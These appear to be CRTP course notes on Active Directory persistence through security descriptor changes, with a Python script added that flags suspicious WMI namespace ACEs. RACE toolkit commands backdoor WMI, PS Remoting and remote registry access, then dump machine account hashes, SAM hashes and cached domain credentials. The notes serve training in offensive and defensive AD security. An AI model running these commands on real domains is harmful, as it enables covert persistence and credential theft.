CRTP Notes

Security Descriptors

Last updated 7 months ago

Format

Security Descriptor Definition Language (SDDL) defines the format which is used to describe a security descriptor.

ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid

Detailed docs about SDDL: ACE Strings - Win32 apps (Microsoft Learn).

Exploitation

Once we have administrator privileges it is possible to create a backdoor by modifying the Security Descriptors (Owner, primary group, DACL and SACL) of multiple remote access methods so that non-admin users are allowed access.

WMI - GUI

It is possible to add an ACE for the non-admin user using Component Services and Computer Management.

Apply to all namespaces

# Check if it worked: the query succeeds (no "access denied") once the ACE is in place
gwmi -class win32_operatingsystem -ComputerName <dc_machine>

WMI - PowerShell

ACE for built-in administrators on WMI namespaces: A;CI;CCDCLCSWRPWPRCWD;;;SID

In order to get access to WMI namespaces, the attacker needs to create a new ACE with the same rights for the SID of the non-admin user they control.

Requires Domain Admin privileges.

# Loading the module
. C:\AD\Tools\RACE-master\RACE.ps1

# Add an ACE for student1 on the root\cimv2 namespace of dcorp-dc
Set-RemoteWMI -SamAccountName student1 -ComputerName dcorp-dc -namespace 'root\cimv2' -Verbose

# With explicit credentials
Set-RemoteWMI -SamAccountName student1 -ComputerName dcorp-dc -Credential Administrator -namespace 'root\cimv2' -Verbose

# Remove
Set-RemoteWMI -SamAccountName student1 -ComputerName dcorp-dc -namespace 'root\cimv2' -Remove -Verbose

PS Remoting (not stable after August 2020 patches)

Set-RemotePSRemoting -SamAccountName student1 -ComputerName dcorp-dc -Verbose

# Remove
Set-RemotePSRemoting -SamAccountName student1 -ComputerName dcorp-dc -Remove
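An added example (not from these notes or from the RACE project) that parses the ACE string format described above: it decodes the DACL of a WMI namespace security descriptor, maps each rights token to the permission bit WMI assigns to it, and reports allow-ACEs that grant remote access or DACL/owner control to a trustee outside the namespace's default set. The sample descriptor is constructed (the default root\cimv2 DACL plus one extra ACE with a placeholder domain SID), and the default-trustee set and the bit meanings are assumptions taken from the SDDL and WMI security documentation.

```python
import re
from dataclasses import dataclass
# SDDL rights tokens as WMI interprets those bits on a namespace (DS-named letters, same bit positions).
WMI_RIGHTS = {
    "CC": (0x00001, "WBEM_ENABLE"), "DC": (0x00002, "WBEM_METHOD_EXECUTE"),
    "LC": (0x00004, "WBEM_FULL_WRITE_REP"), "SW": (0x00008, "WBEM_PARTIAL_WRITE_REP"),
    "RP": (0x00010, "WBEM_WRITE_PROVIDER"), "WP": (0x00020, "WBEM_REMOTE_ACCESS"),
    "SD": (0x10000, "DELETE"), "RC": (0x20000, "READ_CONTROL"),
    "WD": (0x40000, "WRITE_DAC"), "WO": (0x80000, "WRITE_OWNER"),
}
SID_ALIASES = {"BA": "S-1-5-32-544", "SY": "S-1-5-18", "AU": "S-1-5-11", "NS": "S-1-5-20", "LS": "S-1-5-19"}
# Assumption: trustees holding rights on root\cimv2 out of the box; any other trustee deserves a look.
DEFAULT_TRUSTEES = {"S-1-5-32-544", "S-1-5-18", "S-1-5-11", "S-1-5-20", "S-1-5-19"}
SENSITIVE = WMI_RIGHTS["WP"][0] | WMI_RIGHTS["WD"][0] | WMI_RIGHTS["WO"][0]
@dataclass
class Ace:
    ace_type: str  # "A" allow, "D" deny
    flags: str     # e.g. "CI": container inherit, so the ACE also applies to child namespaces
    mask: int
    sid: str
def parse_aces(sddl: str) -> list[Ace]:
    """Split the DACL of an SDDL string into ACEs (ace_type;flags;rights;guid;inherit_guid;sid)."""
    dacl = re.search(r"D:[A-Z]*((?:\([^)]*\))+)", sddl)
    if not dacl:
        raise ValueError("no DACL found in SDDL string")
    aces = []
    for body in re.findall(r"\(([^)]*)\)", dacl.group(1)):
        fields = body.split(";")
        if len(fields) != 6:
            raise ValueError(f"malformed ACE: {body!r}")
        ace_type, flags, rights, _obj_guid, _inh_guid, sid = fields
        if rights.lower().startswith("0x"):  # rights may be a raw hex mask ...
            mask = int(rights, 16)
        else:  # ... or a run of two-letter tokens; an unknown token raises KeyError
            mask = 0
            for i in range(0, len(rights), 2):
                mask |= WMI_RIGHTS[rights[i:i + 2]][0]
        aces.append(Ace(ace_type, flags, mask, SID_ALIASES.get(sid, sid)))
    return aces
def suspicious_aces(sddl: str) -> list[tuple[str, list[str]]]:
    """Allow-ACEs granting remote access or DACL/owner control to a non-default trustee."""
    findings = []
    for ace in parse_aces(sddl):
        if ace.ace_type == "A" and ace.sid not in DEFAULT_TRUSTEES and ace.mask & SENSITIVE:
            findings.append((ace.sid, [n for bit, n in WMI_RIGHTS.values() if ace.mask & bit]))
    return findings

# Constructed sample: default root\cimv2 DACL plus one added ACE for a domain user (placeholder SID).
SAMPLE = ("O:BAG:BAD:(A;CI;CCDCLCSWRPWPRCWD;;;BA)(A;CI;CCDCRP;;;NS)(A;CI;CCDCRP;;;LS)(A;CI;CCDCRP;;;AU)"
          "(A;CI;CCDCLCSWRPWPRCWD;;;S-1-5-21-111111111-222222222-333333333-1105)")
```

The same check can be run over the SDDL of a real namespace (the descriptor returned by the __SystemSecurity class, converted to string form) to spot an ACE for an unexpected trustee.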

Remote Registry

ACLs can be modified to allow non-admin users using the RACE toolkit:

# Modify ACE with admin privs
Add-RemoteRegBackdoor -ComputerName <remotehost> -Trustee student1 -Verbose

The registry backdoor (DAMP) then allows the non-admin user to retrieve the machine account hash, the SAM (local account hashes) and the cached domain credentials of the computer:

# retrieve machine hash
Get-RemoteMachineAccountHash -ComputerName <remotehost> -Verbose

# retrieve local account hash
Get-RemoteLocalAccountHash -ComputerName <remotehost> -Verbose

# retrieve domain cached credentials
Get-RemoteCachedCredential -ComputerName <remotehost> -Verbose
